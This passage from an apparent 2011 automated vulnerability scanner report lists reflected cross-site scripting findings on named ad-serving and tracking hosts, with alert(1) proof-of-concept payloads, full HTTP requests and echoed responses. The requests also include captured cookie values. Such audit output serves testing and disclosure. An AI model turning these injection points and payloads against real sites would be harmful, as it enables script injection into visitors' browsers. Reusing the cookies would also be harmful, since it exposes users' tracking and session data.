Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=5701394888f';alert(1)//bc918fe2e78" target="_blank">
...[SNIP]...

5.56. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e11d8'%3balert(1)//93f53f18417 was submitted in the mpvc parameter. This input was echoed as e11d8';alert(1)//93f53f18417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3fe11d8'%3balert(1)//93f53f18417 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:51:52 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?e11d8';alert(1)//93f53f18417http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=570139" target="_blank">
...[SNIP]...

5.57. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c25c0"%3balert(1)//f9353723fef was submitted in the mpvc parameter. This input was echoed as c25c0";alert(1)//f9353723fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3fc25c0"%3balert(1)//f9353723fef HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:51:50 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?c25c0";alert(1)//f9353723fef");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?c25c0";a
...[SNIP]...

5.58. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 845e0%0aalert(1)//2a6a5889652 was submitted in the url parameter. This input was echoed as 845e0
alert(1)//2a6a5889652
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/recommended_pages.xml845e0%0aalert(1)//2a6a5889652&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/by-category/Sailing_Regatta HTTP/1.1
Host: iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:11:26 GMT
Expires: Fri, 06 May 2011 21:11:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 136

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/recommended_pages.xml845e0
alert(1)//2a6a5889652
. HTTP error 400

5.59. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adi/nbcu.lim.har/news-local-article

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3573"style%3d"x%3aexpression(alert(1))"61fc2b812f1 was submitted in the !category parameter. This input was echoed as e3573"style="x:expression(alert(1))"61fc2b812f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/nbcu.lim.har/news-local-article;!category=e3573"style%3d"x%3aexpression(alert(1))"61fc2b812f1 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:11 GMT
Expires: Sat, 07 May 2011 22:38:11 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/n;44306;0-0;0;60666716;6202-272/94;0/0/0;;~okv=;!category=e3573"style="x:expression(alert(1))"61fc2b812f1;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.60. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adi/nbcu.lim.har/pid_ap_news-politics-article

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f640"style%3d"x%3aexpression(alert(1))"9aa3ecb8008 was submitted in the !category parameter. This input was echoed as 7f640"style="x:expression(alert(1))"9aa3ecb8008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/nbcu.lim.har/pid_ap_news-politics-article;!category=7f640"style%3d"x%3aexpression(alert(1))"9aa3ecb8008 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:04 GMT
Expires: Sat, 07 May 2011 22:38:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/u;44306;0-0;0;51208971;6202-272/94;0/0/0;;~okv=;!category=7f640"style="x:expression(alert(1))"9aa3ecb8008;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.61. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adj/nbcu.lim.har/hp-index

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f39c'%3balert(1)//0561d806161 was submitted in the !category parameter. This input was echoed as 2f39c';alert(1)//0561d806161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/nbcu.lim.har/hp-index;!category=2f39c'%3balert(1)//0561d806161 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:37:36 GMT
Expires: Sat, 07 May 2011 22:37:36 GMT

document.write('<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/m;44306;0-0;0;39564225;6202-272/94;0/0/0;;~okv=;!category=2f39c';alert(1)//0561d806161;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.62. http://iv.doubleclick.net/adj/nbcu.lim.har/news-local-article [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adj/nbcu.lim.har/news-local-article

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1dd'%3balert(1)//1430357386d was submitted in the !category parameter. This input was echoed as cf1dd';alert(1)//1430357386d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/nbcu.lim.har/news-local-article;!category=cf1dd'%3balert(1)//1430357386d HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 327
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:18 GMT
Expires: Sat, 07 May 2011 22:38:18 GMT

document.write('<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/n;44306;0-0;0;60666716;6202-272/94;0/0/0;;~okv=;!category=cf1dd';alert(1)//1430357386d;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.63. http://iv.doubleclick.net/adj/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adj/nbcu.lim.har/pid_ap_news-politics-article

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a6d'%3balert(1)//51dc94f4e3b was submitted in the !category parameter. This input was echoed as 34a6d';alert(1)//51dc94f4e3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/nbcu.lim.har/pid_ap_news-politics-article;!category=34a6d'%3balert(1)//51dc94f4e3b HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 327
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:13 GMT
Expires: Sat, 07 May 2011 22:38:13 GMT

document.write('<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/u;44306;0-0;0;51208971;6202-272/94;0/0/0;;~okv=;!category=34a6d';alert(1)//51dc94f4e3b;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.64. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 9b3c3<script>alert(1)</script>fd92264a39e was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS9b3c3<script>alert(1)</script>fd92264a39e&num=4&layt=624x300&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:08 GMT
Content-Type: application/x-javascript
Content-Length: 85

// Error: Unknown old section SCMAGAZINE_ROS9b3c3<script>alert(1)</script>fd92264a39e

5.65. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e69b7<script>alert(1)</script>70b75349d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp&e69b7<script>alert(1)</script>70b75349d17=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:28 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter e69b7<script>alert(1)</script>70b75349d17

5.66. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6dea5<script>alert(1)</script>3bb340fdd25 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=I109856dea5<script>alert(1)</script>3bb340fdd25&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; 